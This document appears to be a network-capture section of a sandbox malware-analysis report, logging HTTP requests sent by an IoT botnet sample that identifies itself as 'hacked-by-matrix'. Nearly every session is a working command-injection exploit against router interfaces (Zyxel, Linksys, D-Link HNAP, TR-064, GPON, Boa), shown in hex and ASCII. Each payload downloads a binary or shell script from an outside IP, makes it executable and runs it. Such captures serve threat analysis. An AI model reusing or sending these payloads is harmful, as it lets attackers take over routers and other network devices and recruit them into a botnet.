                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2010192.168.2.1346190213.164.0.8580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:39.158663034 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2011192.168.2.1350238178.239.116.180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:39.189641953 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:39.829643965 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2012192.168.2.1350200213.127.179.1621723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:39.638381004 CET270OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:42.767388105 CET270OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2013192.168.2.1347854206.191.159.24780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:39.880182028 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:40.172240019 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:40.261674881 CET339INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.6.2
                                                        Date: Thu, 21 Mar 2024 04:23:40 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Content-Encoding: gzip
                                                        Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
                                                        Mar 21, 2024 05:23:40.261713028 CET335INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.6.2
                                                        Date: Thu, 21 Mar 2024 04:23:40 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 172
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.6.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2014192.168.2.134900082.97.191.8780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:39.964948893 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2015192.168.2.1350142172.65.18.1455555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:39.976339102 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2016192.168.2.1353392172.87.213.13755555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:40.229154110 CET426OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2017192.168.2.1356058172.65.135.1978081
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:40.400302887 CET763OUTPOST /HNAP1/ HTTP/1.0
                                                        Content-Type: text/xml; charset="utf-8"
                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`
                                                        Content-Length: 640
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2018192.168.2.1335322118.240.97.47547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:40.619517088 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:40.911238909 CET88INHTTP/1.1 500 Internal Server Error
                                                        Connection: Close
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2019192.168.2.1335258101.108.186.1237547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:40.700186968 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:41.829660892 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2020192.168.2.1346290109.176.191.147443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:40.867002010 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2021192.168.2.1344814118.2.208.60443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:40.867099047 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2022192.168.2.1346078212.220.92.101443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:40.867120981 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2023192.168.2.13330865.45.30.131443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:40.867120981 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
